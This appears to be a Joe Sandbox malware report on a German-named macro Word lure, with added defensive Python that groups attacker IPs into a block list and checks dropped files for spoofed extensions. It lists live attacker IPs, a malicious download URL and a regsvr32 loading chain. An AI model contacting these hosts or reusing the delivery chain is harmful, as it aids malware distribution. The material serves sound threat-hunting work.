• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Excluded IPs from analysis (whitelisted): 93.184.220.29, 13.64.90.137, 131.253.33.200, 13.107.22.200, 20.50.102.62, 13.88.21.125, 92.122.145.220, 52.109.76.68, 52.109.76.35, 52.109.76.34, 52.147.198.201, 184.30.24.56, 20.82.209.183, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129
• Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, dual-a-0001.dc-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                45.142.215.160Datei-04.28.2021.docGet hashmaliciousBrowse

                                                                                                                                                  Domains

                                                                                                                                                  No context

                                                                                                                                                  ASN

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  CLOUDSOLUTIONSRUDatei-04.28.2021.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.160
                                                                                                                                                  richiedere-04.26.21.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.164
                                                                                                                                                  richiedere-04.26.21.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.164
                                                                                                                                                  richiedere-04.26.21.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.164
                                                                                                                                                  verschreiben.04.26.2021.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.163
                                                                                                                                                  verschreiben.04.26.2021.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.163
                                                                                                                                                  verschreiben.04.26.2021.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.163
                                                                                                                                                  3IsEcDekqj.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.63
                                                                                                                                                  Handel-04.20.2021.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.16
                                                                                                                                                  Handel-04.20.2021.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.16
                                                                                                                                                  der Vorschlag.04.21.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.16
                                                                                                                                                  der Vorschlag.04.21.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.16
                                                                                                                                                  der Vorschlag.04.21.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.16
                                                                                                                                                  zu erzaehlen.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.32
                                                                                                                                                  zu erzaehlen.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.32
                                                                                                                                                  zu erzaehlen.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.32
                                                                                                                                                  verschreiben 04.16.2021.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.32
                                                                                                                                                  verschreiben 04.16.2021.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.32
                                                                                                                                                  verschreiben 04.16.2021.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.32
                                                                                                                                                  zu fordern.04.21.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.213.182
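The IP context above lists only the one host this sample contacted (45.142.215.160), but the ASN rows show six distinct hosts in 45.142.215.0/24 serving the same family of lures (German and Italian document names, the same regsvr32 chain) over roughly two weeks, plus one straggler in 45.142.213.0/24. The practical pivot is therefore the prefix, not the single address. The script below is an added example and not part of the Joe Sandbox report: it takes the (sample, IP) pairs transcribed from the ASN table, groups them by /24, lists which related samples a given IP would tie back to, and derives a block list that widens to the whole prefix only when several distinct hosts in it were observed. The function names summarize(), related_samples() and blocklist() are the example's own.

```python
"""
Added example (not part of the Joe Sandbox report): pivot from the one IP this
sample contacted to the /24 the ASN context rows point at, and derive a block
list that also covers the sibling samples' hosts.
"""
import ipaddress
from collections import defaultdict

# (sample name, context IP) pairs transcribed from the ASN context table on this
# page. Transcribed by hand, not fetched from Joe Sandbox.
ASN_CONTEXT = [
    ("Datei-04.28.2021.doc", "45.142.215.160"),
    ("richiedere-04.26.21.doc", "45.142.215.164"),
    ("richiedere-04.26.21.doc", "45.142.215.164"),
    ("richiedere-04.26.21.doc", "45.142.215.164"),
    ("verschreiben.04.26.2021.doc", "45.142.215.163"),
    ("verschreiben.04.26.2021.doc", "45.142.215.163"),
    ("verschreiben.04.26.2021.doc", "45.142.215.163"),
    ("3IsEcDekqj.exe", "45.142.215.63"),
    ("Handel-04.20.2021.doc", "45.142.215.16"),
    ("Handel-04.20.2021.doc", "45.142.215.16"),
    ("der Vorschlag.04.21.doc", "45.142.215.16"),
    ("der Vorschlag.04.21.doc", "45.142.215.16"),
    ("der Vorschlag.04.21.doc", "45.142.215.16"),
    ("zu erzaehlen.doc", "45.142.215.32"),
    ("zu erzaehlen.doc", "45.142.215.32"),
    ("zu erzaehlen.doc", "45.142.215.32"),
    ("verschreiben 04.16.2021.doc", "45.142.215.32"),
    ("verschreiben 04.16.2021.doc", "45.142.215.32"),
    ("verschreiben 04.16.2021.doc", "45.142.215.32"),
    ("zu fordern.04.21.doc", "45.142.213.182"),
]


def summarize(rows, prefixlen=24):
    """Group context rows by /prefixlen network.

    Returns {"<network>/<prefixlen>": {"ips": [distinct hosts, numerically sorted],
                                        "samples": [distinct sample names, sorted]}}.
    Works for IPv6 rows too, because ipaddress handles both families.
    """
    groups = defaultdict(lambda: {"ips": set(), "samples": set()})
    for name, ip in rows:
        net = ipaddress.ip_network(f"{ip}/{prefixlen}", strict=False)
        groups[net]["ips"].add(ipaddress.ip_address(ip))
        groups[net]["samples"].add(name)
    return {
        str(net): {
            "ips": [str(a) for a in sorted(g["ips"])],
            "samples": sorted(g["samples"]),
        }
        for net, g in groups.items()
    }


def related_samples(ip, rows, prefixlen=24):
    """Sample names whose context host sits in the same /prefixlen as `ip`.

    This is the hunt pivot: a new IP from the same range ties back to every
    sibling submission even if that exact address was never seen before.
    """
    net = ipaddress.ip_network(f"{ip}/{prefixlen}", strict=False)
    return sorted({name for name, other in rows if ipaddress.ip_address(other) in net})


def blocklist(rows, prefixlen=24, min_hosts=2):
    """Block a whole prefix once at least `min_hosts` distinct hosts in it were
    observed across related samples. A prefix with a single host stays a host
    route (/32 or /128) so one stray IP does not take a shared range with it."""
    entries = []
    for net, g in summarize(rows, prefixlen).items():
        if len(g["ips"]) >= min_hosts:
            entries.append(net)
        else:
            entries.extend(str(ipaddress.ip_network(ip)) for ip in g["ips"])
    return sorted(entries)


if __name__ == "__main__":
    for net, g in summarize(ASN_CONTEXT).items():
        print(net, len(g["ips"]), "hosts,", len(g["samples"]), "distinct samples")
    print("block:", blocklist(ASN_CONTEXT))
```

On this page's data the result is one /24 (six hosts, eight distinct sample names) and one host route for 45.142.213.182; raise min_hosts or lower prefixlen when the ASN is a large shared hoster where a /24 would catch unrelated tenants.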

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\argumentSelectTmp.jpg
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: HTML document, ASCII text
Category: dropped
Size (bytes): 204
Entropy (8bit): 5.134216527532146
Encrypted: false
SSDEEP: 6:pn0+Dy9xwGObRmEr6VnetdzRx3F3KCezocKqD:J0+oxBeRmR9etdzRxxez1T
MD5: FEDDB78986726A4A2161D362A5D52F25
SHA1: BAAA81B272211FA22DF14E3DCA322CE63FFA50B4
SHA-256: 2793291CF9D1C679B16DA071414FDE1E27A07508B616572332953DE5BB77083E
SHA-512: 42DAB38699465155F38326F6967F358549E89A470971CB66F7ECD08FC439CC18A8377FF9B2BF24882B13AE548A4DE9FFCC6FEB2E1EDA2484F9ADFDD489EBF92A
Malicious: false
Reputation: low
Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "laka4" was not found on this server.</p>.</body></html>.
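The file above is what the macro wrote to C:\ProgramData under a .jpg name and then handed to regsvr32. Its preview is not an image and not a DLL but a 204-byte HTTP 404 page ("laka4" not found), so in this sandbox run the second stage was never delivered and regsvr32 had nothing it could register; that is consistent with the report marking this particular file Malicious: false even though the chain that produced it is malicious. regsvr32 hands the path to LoadLibrary as given, so the extension is irrelevant to it, and on a live server the same name would have carried a PE. The script below is an added example and not part of the Joe Sandbox report: it rebuilds the dropped bytes from the preview (assuming each "." in the preview stands for a line feed, which reproduces the reported 204-byte size), recomputes the report's size, entropy and hash fields, and flags the mismatch between the declared .jpg extension and the sniffed content. The names sniff(), expected_type_for() and triage() are the example's own.

```python
"""
Added example (not part of the Joe Sandbox report): reconstruct the dropped
argumentSelectTmp.jpg from the report's preview, recompute the report's file
metadata, and flag the extension/content mismatch that a regsvr32 target with
a non-DLL extension deserves.
"""
import hashlib
import math
from collections import Counter

# Bytes reconstructed from the report's Preview field. Assumption: the "."
# separators in the preview are line feeds; with that, the length comes out
# at exactly the 204 bytes the report lists. Reconstructed from the page, not
# copied from the sandbox artifact.
DROPPED_JPG = (
    b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
    b"<html><head>\n"
    b"<title>404 Not Found</title>\n"
    b"</head><body>\n"
    b"<h1>Not Found</h1>\n"
    b'<p>The requested URL "laka4" was not found on this server.</p>\n'
    b"</body></html>\n"
)


def sniff(data: bytes) -> str:
    """Classify content by magic bytes, not by file name.

    Only a PE image ("MZ") can be registered by regsvr32; a real JPEG starts
    with the SOI marker 0xFFD8 followed by 0xFF. Anything else is "other".
    """
    if data[:2] == b"MZ":
        return "pe"
    if data[:3] == b"\xff\xd8\xff":
        return "jpeg"
    head = data[:64].lstrip().lower()
    if head.startswith((b"<!doctype html", b"<html")):
        return "html"
    return "other"


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def expected_type_for(path: str) -> str:
    """What the extension claims the content is."""
    ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""
    return {"jpg": "jpeg", "jpeg": "jpeg", "dll": "pe", "ocx": "pe", "exe": "pe"}.get(ext, "other")


def triage(path: str, data: bytes) -> dict:
    """Report-style metadata plus two verdicts: does the content match the
    extension, and could regsvr32 have loaded it at all."""
    actual = sniff(data)
    declared = expected_type_for(path)
    return {
        "path": path,
        "size": len(data),
        "entropy": round(shannon_entropy(data), 6),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "declared_type": declared,
        "actual_type": actual,
        "extension_spoofed": actual != declared,
        "loadable_by_regsvr32": actual == "pe",
    }


if __name__ == "__main__":
    for key, value in triage(r"C:\ProgramData\argumentSelectTmp.jpg", DROPPED_JPG).items():
        print(f"{key}: {value}")
```

Run the same triage() over any file a regsvr32 or rundll32 command line points at: a "pe" verdict behind a .jpg, .png or .txt name is the spoofed-extension case worth alerting on, while an "html" verdict like the one here tells the analyst the download failed and the real payload still has to be obtained from a live server.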
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\A87B51A9-A3C7-4F56-B132-575A1B8D2861
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 134558
Entropy (8bit): 5.368408674816341
Encrypted: false
SSDEEP: 1536:xcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:OEQ9DQW+zPXO8
MD5: 311806B4B6FD76169530A0D8AA27F87A
SHA1: 7E03FA01F7C5FB2237868BBBA80BF5DB58D5428E
SHA-256: 04011A3382253AC5B3BB0584F414B114C33CAFCF7F7C9065BF2C3BBCDFFE24F8
SHA-512: 9902ED4949C849E9A4D58DBDFD09597DB921DC1901B3A88AD1E23B9406791C2967578CF31F3326EF1B9871209ECB8FB5856EB2D7390DF12DCACD0B21BDC48133
Malicious: false
Reputation: low
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-28T15:53:39">.. Build: 16.0.14026.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\547D46CD.jpeg
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: [TIFF image data, little-endian, direntries=14, height=630, bps=182, compression=LZW, PhotometricIntepretation=RGB, orientation=upper-left, width=2288], baseline, precision 8, 828x186, frames 3
Category: dropped
Size (bytes): 79188
Entropy (8bit): 7.847381222647767
Encrypted: false
SSDEEP: 1536:3hdklvI0APY2ywnbcbWSfZL2+wSJx8+RBZe0nV3AgXf0lSQw6eh:MlZAPY2yWwb3ZadaxHeuNQpeh
MD5: A1BAC07A20C5DF390D6D96B0FB713F5D
SHA1: 427F044786B5C412EF3B424CDA2DEA817AA9CCA6
SHA-256: 0638205EBB792E3447169B46FBFB6BC48A1433B8335794ED4CEB6706F5290EF3
SHA-512: 1EBB00551E59417AA5CC16D195E27EE227342108C4C093D9A747241BAC6AC54A48262686AD3911DFDCF89AA1EA3E2A1C91CAE790252A5C2C81978F362CCA2BA1
Malicious: false
Reputation: moderate, very likely benign file
                                                                                                                                                  Preview: .....xExif..II*...........................v...................................................................................................(...........1...........2...........i...........0................'.......'..Adobe Photoshop 22.2 (Windows).2021:04:08 01:34:08..........................<...........................................~...............(.......................................H.......H.............Adobe_CM......Adobe.d.................................................................................................................................................$...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......S.,.2....}....sC.:.....k..}OS.6~..?Yz.......}M...|....
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRC0000.tmp
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: Microsoft Word 2007+
Category: dropped
Size (bytes): 17942
Entropy (8bit): 7.402079594689573
Encrypted: false
SSDEEP: 384:Jg+SiC78IKpodS2kC556akwLWdxd0pfB3lXMUES7ls:cV8xo5krakw6L0pfLMRgs
MD5: 750EA3694D64FBF745FF350EEDF81300
SHA1: 333AD1C748B5AF88F2296347D9161072F3B0FFDD
SHA-256: ADDFC062C6618726504DCD124B5A4EAEFC38FB2E72A7CC9076354C0A5A719A94
SHA-512: 1FFBEB0C5407341E9302673050D8D3562CB05EA0EFDE0FE36745F56A0FD49AD0EB5E6EF295FD3D6A0DAABBAFC47E217982B61F6D1581732C3C581E931DC1F919
Malicious: false
Reputation: low
                                                                                                                                                  Preview: PK..........!.Q3.p............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ......J..0....K......H...R*.D.g..3.H....M!`.l.....J.j;*...>.b.Fa...B....wz...<`F..K6.._s.r.F`.<X.T....7....U.._t:.\:...<&....A%&:f.9..H.hd..*1y.Lx.k)".........e..k.g.....)....&......A...3..WNN.U..e...<....'4(.....x.....nh.t.....p7..j..s...I@.w6.X..C.Tp...r+..^..F.N...".az...h.[!F.!...g...i"...C..n9.~l...3.....H..V..9.2.,)s..GZD..mo6M..a.!...q$.......O..r-.........PK..........!.........N......
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{9CE060EB-57B2-4D10-B350-6C5157BDAA6D}.tmp
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1536
Entropy (8bit): 0.1903644670878318
Encrypted: false
SSDEEP: 3:/lMlt4slllFlNtwl5h9Z9:+lr45v
MD5: 43EADFFEFD5914B486C8193474EA3408
SHA1: 048972F9F902493E595F848E45052DF938621907
SHA-256: 46F3BCD8D35DE83BDD29CA5C831E78C421869E3D4D0F8DDD60CD2A9E8E60ED77
SHA-512: 11BBE96AFE28472C497DC7252560D77B9595C904C2253881AC407DFD5F23A3D4EA29526DB4DCA242B074D83217459D10FB428ACF92B934C17C286E73A87A3338
Malicious: false
Reputation: moderate, very likely benign file
                                                                                                                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{CBEA3AE0-72F5-4309-8667-0310211F1AE9}.tmp
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
Reputation: high, very likely benign file
                                                                                                                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{CD582963-AB60-4B3D-8985-14AC1ED35740}.tmp
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1024
                                                                                                                                                  Entropy (8bit):0.05390218305374581
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\laka4[1].htm
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                  Category:downloaded
                                                                                                                                                  Size (bytes):204
                                                                                                                                                  Entropy (8bit):5.134216527532146
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3F3KCezocKqD:J0+oxBeRmR9etdzRxxez1T
                                                                                                                                                  MD5:FEDDB78986726A4A2161D362A5D52F25
                                                                                                                                                  SHA1:BAAA81B272211FA22DF14E3DCA322CE63FFA50B4
                                                                                                                                                  SHA-256:2793291CF9D1C679B16DA071414FDE1E27A07508B616572332953DE5BB77083E
                                                                                                                                                  SHA-512:42DAB38699465155F38326F6967F358549E89A470971CB66F7ECD08FC439CC18A8377FF9B2BF24882B13AE548A4DE9FFCC6FEB2E1EDA2484F9ADFDD489EBF92A
                                                                                                                                                  Malicious:false
                                                                                                                                                  IE Cache URL:http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs
                                                                                                                                                  Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "laka4" was not found on this server.</p>.</body></html>.
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):170164
                                                                                                                                                  Entropy (8bit):4.363515954994734
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:fJNoRXaLzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:ffoog8WpFpKKHHedydFeo+oQLUlPoK0
                                                                                                                                                  MD5:2EF82388B599F560F5A36C3E7B2C0D9E
                                                                                                                                                  SHA1:717942BFB7DD27FD8ABC76E81B01716BE4FF5090
                                                                                                                                                  SHA-256:759C5E3596DF80EA4C95D00BD7D93EE18D676CF24E8BE74CFF95417B06958E68
                                                                                                                                                  SHA-512:590A751D31912A0D6B700812A2A0D471D99DE8DDC979388CABFD3CE0345BBEF34763CB9341EA2AA0D2FD3FF0086B27904D1C2720BE173AB84B2539DB56CAF62C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................$................................................ ...............................x...I..............T........................................... ...................................................
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Datei-04.28.2021.LNK
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:03 2020, mtime=Wed Apr 28 23:53:40 2021, atime=Wed Apr 28 23:53:37 2021, length=90627, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2180
                                                                                                                                                  Entropy (8bit):4.717758588277304
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:8JwV2rEDQArK6bDyd7aB6myJwV2rEDQArK6bDyd7aB6m:86V2KrKEB6p6V2KrKEB6
                                                                                                                                                  MD5:EDEAA19361D5BBE087F35EC82095408D
                                                                                                                                                  SHA1:4CDE6D44946E1D6954394C9931EA340EAE0B6218
                                                                                                                                                  SHA-256:3A50C5BBE2F6648DF765AF1D93BA959AFC8F2C9EC40B13F96525DD28ABE86E8E
                                                                                                                                                  SHA-512:00B395C4F09AE2A46EC74C85FFF42995F5E69AD846AD3A5B33BF0BB3A7C5CC6A572AE0432ACA24205DE6C6A5F636C1378043C49447279762D94E72CD0F394542
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: L..................F.... .....8.8....L...<......<...b...........................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R.......S.......................a.l.f.o.n.s.....~.1.....>Q.u..Desktop.h.......NM..R.......Y..............>.......Q.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2..b...R.. .DATEI-~1.DOC..Z......>Q.u.R......f.....................4L..D.a.t.e.i.-.0.4...2.8...2.0.2.1...d.o.c.......[...............-.......Z...........>.S......C:\Users\user\Desktop\Datei-04.28.2021.doc..+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.a.t.e.i.-.0.4...2.8...2.0.2.1...d.o.c.........:..,.LB.)...Aw...`.......X.......745773...........!a..%.H.VZAj...zXt.+........W...!a..%.H.VZAj...zXt.+........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):86
                                                                                                                                                  Entropy (8bit):4.326022969633015
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:M1SmMIRVELUl5eIRVELUlmX1SmMIRVELUlv:MQ7rLUrerLUf7rLU1
                                                                                                                                                  MD5:0BDE91546ED3D50D1B9A1B4A37CF9572
                                                                                                                                                  SHA1:16FC4A4A6EA006B381E57857AB4B29D966A847EB
                                                                                                                                                  SHA-256:4066E345B4B51909606757F4B5875000A5C838A8F8DE107415E6D67470FB032E
                                                                                                                                                  SHA-512:5133A71D4FBEE2EE09CA4626944F07C7AE3DF9F24CC6C3767488A57D9E1E23A6E6D01C8521A56A811DFE3CA18B375AEA3B8E45534A2DABA4FD1869307AD91FDC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: [doc]..Datei-04.28.2021.LNK=0..Datei-04.28.2021.LNK=0..[doc]..Datei-04.28.2021.LNK=0..
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):162
                                                                                                                                                  Entropy (8bit):1.494861186799854
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Rl/Zd0lbkj3kllalRhlXlk:RtZCbyk2
                                                                                                                                                  MD5:4C507C3324F22A4C2BFFBDD520DD5674
                                                                                                                                                  SHA1:E44DB415A96B00B95B2BF061C7DEB3B8C88E0967
                                                                                                                                                  SHA-256:99A8179412ADA135B685AB226D0AF920DBF689422EE95A375EC687BF7561D775
                                                                                                                                                  SHA-512:2C99AC5A727014748E955F7117C3C2C2379993012A3167AB37A7C2C5E5E9F05DF197748EE3165A2E09E950926EFBFE1AE6F2DAA60CC141CD3B4B00D3AC483606
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .pratesh................................................p.r.a.t.e.s.h...................................pLA.......................................................
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CR line terminators
